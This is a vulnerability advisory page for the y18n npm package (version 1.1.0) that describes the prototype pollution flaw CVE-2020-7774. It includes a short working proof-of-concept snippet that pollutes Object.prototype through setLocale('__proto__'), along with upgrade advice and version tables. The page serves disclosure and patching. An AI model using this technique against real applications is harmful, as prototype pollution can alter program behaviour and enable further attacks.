NodeJS/y18n/1.1.0
the bare-bones internationalization library used by yargs
https://www.npmjs.com/package/y18n
ISC
1 Security Vulnerabilities
Prototype Pollution in y18n
Published date: 2021-03-29T16:05:12Z
CVE: CVE-2020-7774
Links:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7774
- https://github.com/advisories/GHSA-c4w7-xm78-47vh
- https://github.com/yargs/y18n/issues/96
- https://github.com/yargs/y18n/pull/108
- https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
- https://snyk.io/vuln/SNYK-JS-Y18N-1021887
- https://github.com/yargs/y18n/commit/a9ac604abf756dec9687be3843e2c93bfe581f25
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf
- https://github.com/yargs/y18n/commit/90401eea9062ad498f4f792e3fff8008c4c193a3
Overview
The npm package y18n
before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
POC
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
Recommendation
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
Affected versions:
["5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "4.0.0", "1.0.0", "1.1.0", "2.0.0", "3.0.0", "3.1.0", "3.2.0", "3.2.1"]
Secure versions:
[6.0.0-alpha.0, 5.0.5, 4.0.1, 3.2.2, 5.0.6, 4.0.2, 5.0.7, 4.0.3, 5.0.8]
Recommendation:
Update to version 5.0.8.
22 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
1.0.0 | ISC | 1 | 2015-07-27 - 07:19 | almost 9 years |
1.1.0 | ISC | 1 | 2015-07-28 - 04:15 | almost 9 years |
2.0.0 | ISC | 1 | 2015-07-28 - 05:07 | almost 9 years |
3.0.0 | ISC | 1 | 2015-07-29 - 07:35 | almost 9 years |
3.1.0 | ISC | 1 | 2015-08-18 - 22:01 | over 8 years |
3.2.0 | ISC | 1 | 2015-09-21 - 20:58 | over 8 years |
3.2.1 | ISC | 1 | 2016-03-17 - 05:04 | about 8 years |
4.0.0 | ISC | 1 | 2017-10-10 - 19:03 | over 6 years |
5.0.0 | ISC | 1 | 2020-09-05 - 02:35 | over 3 years |
5.0.1 | ISC | 1 | 2020-09-05 - 23:57 | over 3 years |
6.0.0-alpha.0 | ISC | 2020-09-12 - 00:20 | over 3 years | |
5.0.2 | ISC | 1 | 2020-10-01 - 18:23 | over 3 years |
5.0.3 | ISC | 1 | 2020-10-16 - 01:52 | over 3 years |
5.0.4 | ISC | 1 | 2020-10-16 - 15:44 | over 3 years |
5.0.5 | ISC | 2020-10-25 - 15:18 | over 3 years | |
4.0.1 | ISC | 2020-11-30 - 23:43 | over 3 years | |
3.2.2 | ISC | 2021-01-04 - 22:47 | over 3 years | |
5.0.6 | ISC | 2021-04-05 - 01:26 | about 3 years | |
4.0.2 | ISC | 2021-04-07 - 01:45 | about 3 years | |
5.0.7 | ISC | 2021-04-07 - 01:46 | about 3 years | |
4.0.3 | ISC | 2021-04-07 - 18:05 | about 3 years | |
5.0.8 | ISC | 2021-04-07 - 18:57 | about 3 years |